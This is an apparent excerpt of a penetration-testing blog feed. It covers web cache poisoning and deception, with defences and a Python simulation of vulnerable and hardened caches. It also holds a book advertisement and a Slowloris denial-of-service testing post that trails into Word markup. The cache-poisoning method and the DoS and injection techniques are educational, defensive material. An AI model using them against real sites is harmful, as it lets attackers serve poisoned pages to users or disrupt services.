In the example above the unkeyed X-Forwarded-Host header is echoed back in the HTML body: the application used it to generate an Open Graph URL inside a meta tag. Because the header is not part of the cache key, the poisoned response is served to every user requesting /en?cb=1 until the entry expires. Note that the response says <i>no-cache</i> and was cached anyway, so never trust the caching headers alone: confirm with a second request, without the injected header, that the reflected value is really served from the cache. In this scenario the reflection can be escalated to XSS, HTML injection or other client-side attacks, depending on where in the page it lands.<br />
<b><br /></b>
<b>Defending against Web Cache attacks</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The best way to defend against web cache deception is to ensure that your website isn't so permissive and never treats requests to nonexistent paths as requests to an existing parent path (return 404 instead). Also:</div>
<div style="text-align: justify;">
<ul>
<li><b>Use the same URL to refer to the same items</b>: Since caches key off both the host and the path to the requested content, ensure that you refer to your content in the same way on all of your pages. The previous recommendation makes this significantly easier. [6]</li>
<li><b>Fingerprint cache items:</b> For static content like CSS and JavaScript files, it may be appropriate to fingerprint each item. This means adding a unique identifier to the filename (often a hash of the file) so that when the resource is modified the new resource name is requested, causing requests to correctly bypass the stale cache entry. [6]</li>
<li><b>Write custom cache rules:</b> A web cache server has to be aware of the nature of the application content, e.g. never cache dynamic or authenticated content on a banking application, and decide cacheability from the origin's Content-Type and Cache-Control headers rather than from the file extension in the URL.</li>
<li><b>Avoid taking input from headers and cookies:</b> Do not build URLs or page content from headers such as X-Forwarded-Host or from cookies. Where such input is unavoidable, validate it against an allow-list and make sure the cache includes it in the key (for example through Vary), so a value supplied by one user can never be served to another.</li>
<li><b>Disable caching if not required:</b> Many services don't require caching, but because it is enabled by default they allow it.</li>
</ul>
</div>
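<div style="text-align: justify;">
To make the deception and poisoning scenarios above, and the defences just listed, concrete, here is an added Python model of an edge cache in front of an origin. It is not code from the original post, from PortSwigger or from Cloudflare, and no real site is involved. It replays the deception case (a permissive /account/ route, like the Django ^newsfeed/ pattern, plus a cache that stores anything ending in .css whatever the origin said) and the poisoning case (an unkeyed X-Forwarded-Host reflected into the og:image tag, as in the Red Hat example), then runs both against a hardened pair: exact routing with 404 for anything else, Cache-Control honoured by the cache, and the Open Graph host taken from configuration instead of the request. Hosts, paths, user names and the cache rules are all assumptions constructed for the example; the cache key is path plus query string only, and the session identity is simulated by the <i>user</i> field rather than a real cookie.</div>

```python
"""Toy edge cache + origin replaying web cache deception and poisoning, then the
hardened versions. Constructed example: hosts, paths, users and rules are assumed."""
import re
from dataclasses import dataclass, field

# Extensions the (vulnerable) edge treats as static and caches unconditionally.
STATIC_EXT = re.compile(r"\.(css|js|png|jpg|gif)$")


@dataclass
class Request:
    path: str                                   # path plus optional ?query
    user: str                                   # simulated session identity
    headers: dict = field(default_factory=dict)


@dataclass
class Response:
    body: str
    cache_control: str


def permissive_origin(req: Request) -> Response:
    """Vulnerable origin: every path under /account/ is routed to the profile page,
    and X-Forwarded-Host is reflected unvalidated into an Open Graph tag."""
    path = req.path.partition("?")[0]
    if path.startswith("/account/"):
        return Response(f"<h1>Profile of {req.user}</h1>", "private")
    host = req.headers.get("X-Forwarded-Host", "www.example.com")
    og = f'<meta property="og:image" content="https://{host}/cms/social.png" />'
    return Response(f"<html>{og}<p>Home</p></html>", "public, max-age=60")


def strict_origin(req: Request) -> Response:
    """Hardened origin: exact routes only (404 otherwise), the sensitive page is
    marked no-store, and the Open Graph host comes from configuration."""
    path = req.path.partition("?")[0]
    if path == "/account/profile":
        return Response(f"<h1>Profile of {req.user}</h1>", "private, no-store")
    if path == "/":
        og = '<meta property="og:image" content="https://www.example.com/cms/social.png" />'
        return Response(f"<html>{og}<p>Home</p></html>", "public, max-age=60")
    return Response("Not Found", "no-store")


class EdgeCache:
    """Cache keyed on path+query only; headers are forwarded but never keyed."""

    def __init__(self, origin, cache_by_extension: bool, honor_cache_control: bool):
        self.origin = origin
        self.cache_by_extension = cache_by_extension  # "static extensions are always safe"
        self.honor_cache_control = honor_cache_control
        self.store = {}

    def cacheable(self, req: Request, resp: Response) -> bool:
        cc = resp.cache_control
        if self.honor_cache_control and ("private" in cc or "no-store" in cc):
            return False
        if self.cache_by_extension and STATIC_EXT.search(req.path.partition("?")[0]):
            return True  # extension wins over whatever the origin said
        return "public" in cc

    def fetch(self, req: Request):
        key = req.path  # X-Forwarded-Host and the user are not part of the key
        if key in self.store:
            return self.store[key], "HIT"
        resp = self.origin(req)
        if self.cacheable(req, resp):
            self.store[key] = resp
        return resp, "MISS"


def deception(edge: EdgeCache):
    """Victim 'alice' is lured to a static-looking URL under her account page; the
    attacker then fetches the same URL anonymously and reads what was cached."""
    edge.fetch(Request("/account/profile/logo.css", user="alice"))
    resp, status = edge.fetch(Request("/account/profile/logo.css", user="anonymous"))
    return status, resp.body


def poisoning(edge: EdgeCache):
    """Attacker seeds the cache through an unkeyed header; the victim's plain
    request for the same key receives the reflected value."""
    edge.fetch(Request("/?cb=1", user="mallory", headers={"X-Forwarded-Host": "canary"}))
    resp, status = edge.fetch(Request("/?cb=1", user="alice"))
    return status, resp.body


def vulnerable_edge() -> EdgeCache:
    return EdgeCache(permissive_origin, cache_by_extension=True, honor_cache_control=False)


def hardened_edge() -> EdgeCache:
    return EdgeCache(strict_origin, cache_by_extension=False, honor_cache_control=True)


def demo() -> dict:
    return {
        "deception_vulnerable": deception(vulnerable_edge()),
        "deception_hardened": deception(hardened_edge()),
        "poisoning_vulnerable": poisoning(vulnerable_edge()),
        "poisoning_hardened": poisoning(hardened_edge()),
    }


if __name__ == "__main__":
    for name, (status, body) in demo().items():
        print(f"{name:22} {status:4} {body}")
```

<div style="text-align: justify;">
Run it directly to see the HIT/MISS status and the body served in each of the four cases. Against a real target the equivalent check is the same two-request pattern: one request that plants the content and a second one, from another session or without the injected header, that confirms the planted content is served from the cache. Note that the hardened home page is still cached (the fix is not "disable caching"); it simply no longer contains anything an attacker controls.</div>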
<div style="text-align: justify;">
<b>Tools for cache poisoning/deception </b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following tools can be used to test for cache poisoning and cache deception: </div>
<div style="text-align: justify;">
<ul>
<li><b>param-miner:</b> This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.[3]</li>
<li><b>Burp Suite Free/Pro: </b>Intruder component [16]</li>
</ul>
</div>
<div style="text-align: justify;">
<b>References:</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div>
<ul>
<li style="text-align: justify;"><a href="https://en.wikipedia.org/wiki/Cache_(computing)">https://en.wikipedia.org/wiki/Cache_(computing)</a> [1]</li>
<li style="text-align: justify;"><a href="https://portswigger.net/blog/practical-web-cache-poisoning">https://portswigger.net/blog/practical-web-cache-poisoning</a> [2]</li>
<li style="text-align: justify;"><a href="https://github.com/PortSwigger/param-miner">https://github.com/PortSwigger/param-miner</a> [3]</li>
<li style="text-align: justify;"><a href="https://www.reddit.com/r/netsec/comments/9668sd/practical_web_cache_poisoning/">https://www.reddit.com/r/netsec/comments/9668sd/practical_web_cache_poisoning/</a> [4]</li>
<li style="text-align: justify;"><a href="https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/">https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/</a> [5]</li>
<li style="text-align: justify;"><a href="https://www.digitalocean.com/community/tutorials/web-caching-basics-terminology-http-headers-and-caching-strategies">https://www.digitalocean.com/community/tutorials/web-caching-basics-terminology-http-headers-and-caching-strategies</a> [6]</li>
<li style="text-align: justify;"><a href="https://support.cloudflare.com/hc/en-us/articles/202775670-How-Do-I-Tell-Cloudflare-What-to-Cache-">https://support.cloudflare.com/hc/en-us/articles/202775670-How-Do-I-Tell-Cloudflare-What-to-Cache-</a> [7]</li>
<li style="text-align: justify;"><a href="https://www.smashingmagazine.com/2017/11/understanding-vary-header/">https://www.smashingmagazine.com/2017/11/understanding-vary-header/</a> [8]</li>
<li style="text-align: justify;"><a href="https://tools.ietf.org/html/rfc8246#page-4">https://tools.ietf.org/html/rfc8246#page-4</a> [9]</li>
<li style="text-align: justify;"><a href="https://tools.ietf.org/html/rfc5861">https://tools.ietf.org/html/rfc5861</a> [10]</li>
<li style="text-align: justify;"><a href="https://community.akamai.com/customers/s/article/Cache-Keys-Why-we-should-know-them?language=en_US">https://community.akamai.com/customers/s/article/Cache-Keys-Why-we-should-know-them?language=en_US</a> [11]</li>
<li style="text-align: justify;"><a href="https://developer.akamai.com/legacy/learn/Overview/Client_Edge_Servers_Origin.html">https://developer.akamai.com/legacy/learn/Overview/Client_Edge_Servers_Origin.html</a> [12]</li>
<li style="text-align: justify;"><a href="https://learn.akamai.com/en-us/webhelp/pulsar-diagnostic-tools/pulsar-diagnostic-tools/GUID-54157798-C972-44C3-9B45-8E09A93A37F0.html">https://learn.akamai.com/en-us/webhelp/pulsar-diagnostic-tools/pulsar-diagnostic-tools/GUID-54157798-C972-44C3-9B45-8E09A93A37F0.html</a> [13]</li>
<li style="text-align: justify;"><a href="https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/">https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/</a> [14]</li>
<li style="text-align: justify;"><a href="https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html">https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html</a> [15]</li>
<li style="text-align: justify;"><a href="https://portswigger.net/burp">https://portswigger.net/burp</a> [16]</li>
<li style="text-align: justify;"><a href="https://support.cloudflare.com/hc/en-us/articles/360023040812-Best-Practice-Caching-Everything-While-Ignoring-Query-Strings">https://support.cloudflare.com/hc/en-us/articles/360023040812-Best-Practice-Caching-Everything-While-Ignoring-Query-Strings</a> [17]</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-61866149892617688932016-05-28T14:27:00.000-07:002016-05-28T15:47:33.794-07:00Hacker’s Elusive Thoughts The Web<div style="text-align: justify;">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
Introduction</h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The reason for this blog post is to advertise my book. First of all I would like to thank all the readers of my blog for their support and feedback on making my articles better. After 12+ years in the penetration testing industry, the time has come for me to publish my book and transfer my knowledge to all the interested people who like hacking and want to learn as much as possible. At the end of the post you will also find a sample chapter. </span><br />
<div class="layoutArea" style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "lmroman12"; font-size: 17.000000pt; font-weight: 700;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJdzuSZxHjjkLepbWq_XlekWCiivUxmzZe97WHxMEczHnkKniJdIBt0FIH9uyKjln-aJRRwIw_aMpHnS6JiAuXTZU5l0BQCF9_uX_NTfASIrMICWzdQLH2Wjd2iECPw4p8BFHRY0fYQs/s1600/jerry_book.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJdzuSZxHjjkLepbWq_XlekWCiivUxmzZe97WHxMEczHnkKniJdIBt0FIH9uyKjln-aJRRwIw_aMpHnS6JiAuXTZU5l0BQCF9_uX_NTfASIrMICWzdQLH2Wjd2iECPw4p8BFHRY0fYQs/s320/jerry_book.png" width="224" /></a></span></div>
<span style="font-family: "lmroman12"; font-size: 17.000000pt; font-weight: 700;">
</span></div>
<div class="layoutArea" style="text-align: justify;">
</div>
<br />
<br />
<h2>
About The Author</h2>
Gerasimos is a security consultant holding an MSc in Information Security, a CREST (CRT), a CISSP, an ITILv3, a GIAC GPEN and a GIAC GAWPT accreditation. Working alongside diverse and highly skilled teams, Gerasimos has been involved in countless comprehensive security tests and web application secure development engagements for global web applications and network platforms, with more than 14 years in web application and application security architecture.<br />
<br />
Gerasimos, progressing further in his career, has participated in various projects providing leadership and accountability for assigned IT security projects, security assurance activities, technical security reviews and assessments, and has conducted validations and technical security testing against pre-production systems as part of overall validations.<br />
<br />
<h2>
Where From You Can Buy The Book </h2>
<div style="text-align: justify;">
This book can be bought from Leanpub. Leanpub is a publishing platform that provides a way to write, publish and sell in-progress and completed ebooks. Anyone can sign up for free and use Leanpub's writing and publishing tools to produce a book and put it up for sale in its bookstore with one click. Authors are paid a royalty of 90% minus 50 cents per transaction with no constraints: they own their work and can sell it elsewhere for any price.<br />
<br />
Authors and publishers can also upload books they have created using their own preferred book production processes and then sell them in the Leanpub bookstore, taking advantage of its high royalty rates and in-progress publishing features. </div>
<br />
<div style="text-align: left;">
For more information about buying the book see: <a href="https://leanpub.com/hackerselusivethoughtstheweb">https://leanpub.com/hackerselusivethoughtstheweb</a></div>
<br />
<h2>
Why I Wrote This Book </h2>
I wrote this book to share my knowledge with anyone who wants to learn about Web Application security, understand how to formalize a Web Application penetration test and build a Web Application penetration test team. <br />
<br />
<u>The main goal of the book is to: </u></div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
Brainstorm with you some interesting ideas and help you build a comprehensive penetration testing framework, which you can easily adapt to your specific needs. Help you understand why you need to write your own tools. Gain a better understanding of some not so well documented attack techniques. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<u>The main goal of the book is not to:</u></div>
<div class="page" style="text-align: justify;" title="Page 2">
<u> </u> <br />
Provide you with a tool kit to perform Web Application penetration tests. Provide you with complex attacks that you will not be able to understand. Provide you with up to date information on the latest attacks.</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
Who This Book Is For </h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This book is written to help hacking enthusiasts become better and standardize their hacking methodologies and techniques, so as to know clearly what to do and why when testing Web Applications. This book will also be very helpful to the following professionals: <br />
<br />
1. Web Application developers.<br />
2. Professional Penetration Testers.<br />
3. Web Application Security Analysts.<br />
4. Information Security professionals.<br />
5. Hiring Application Security Managers.<br />
6. Managing Information Security Consultants.</div>
<div class="page" style="text-align: justify;" title="Page 2">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
How This Book Is Organised </h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
Almost all chapters are written in such a way so as to not require you to read the chapters sequentially, in order to understand the concepts presented, although it is recommended to do so. The following section is going to give you an overview of the book: <br />
<br />
<b>Chapter 1:</b> Formalising Web Application Penetration Tests -</div>
<div class="page" style="text-align: justify;" title="Page 2">
This chapter is a gentle introduction to the world of penetration testing and attempts to give a realistic view of the current landscape. More specifically, it provides information on how to compose a penetration testing team, how to make the team as efficient as possible, and why writing tools and choosing the proper tools is important.<br />
<br /></div>
<div class="page" style="text-align: justify;" title="Page 2">
<b>Chapter 2: </b>Scanning With Class - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
The second chapter focuses on helping you understand the difference between automated and manual scanning from the tester's perspective. It shows you how to write custom scanning tools with Python, and contains chunks of Python code demonstrating how to write tools and design your own scanner. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 3:</b> Payload Management - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining two things: a) what a Web payload is from a security perspective, b) why it is important to obfuscate your payloads. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 4:</b> Infiltrating Corporate Networks Using XXE - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to exploit and elevate an External Entity (XXE) Injection vulnerability. The main purpose of this chapter is not to show you how to exploit an XXE vulnerability, but to broaden your mind on how you can combine multiple vulnerabilities together to infiltrate your target using an XXE vulnerability as an example. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 5:</b> Phishing Like A Boss -</div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to perform phishing attacks using social engineering and Web vulnerabilities. The main purpose of this chapter is to help you broaden your mind on how to combine multiple security issues, to perform phishing attacks. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 6:</b> SQL Injection Fuzzing For Fun And Profit - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to perform and automate SQL injection attacks through obfuscation using Python. It also explains why SQL injection attacks happen and what is the risk of having them in your web applications. <br />
<br />
<br />
<span style="color: red;">Sample Chapter Download </span></div>
<div class="page" style="text-align: justify;" title="Page 2">
From the following link you will be able to download a sample chapter from my book:<br />
<br />
<a href="https://www.dropbox.com/sh/r24hffyg6pkzo2k/AACw024Jqd6jZ5FtziqxnFEDa?dl=0">Sample Book Download</a><br />
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-15314405668419867392015-03-05T09:21:00.001-08:002015-03-05T09:22:00.851-08:00Symmetric Denial of Service Testing - Aka 1 on 1 <b>Intro</b><br />
<br />
This post is going to explain how to test a Denial of Service vulnerability without crashing the actual service. More specifically we will focus on two vulnerabilities: a) the Slowloris vulnerability (also known as the Apache Partial HTTP Request Denial of Service Vulnerability) and b) TLS renegotiation denial of service attacks.<br />
<br />
<b>Apache Partial HTTP Request Denial of Service Vulnerability</b><br />
<br />
The target Apache HTTP Server is vulnerable to a slow HTTP denial of service attack (Slowloris), because it holds a connection open while waiting for the rest of a partial HTTP request. Both Apache 1.x and 2.x are affected. Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces, slowly, one at a time, to a web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server's concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.<br />
<br />
<b>Business Impact</b><br />
<br />
A remote attacker can cause a denial of service against the Web server which would prevent legitimate users from accessing the site.<br />
<br />
<b>Remediation</b><br />
<br />
There is no single vendor patch that removes the issue; mitigate it through configuration (for Apache 2.x, mod_reqtimeout to bound the time a client may take to send the request headers and body, together with connection limits or a reverse proxy that buffers complete requests before forwarding them) and keep the server on the latest supported version.<br />
<br />
<b>Example</b><br />
<br />
<u>Slowloris tool output:</u><br />
<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="footnote text"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
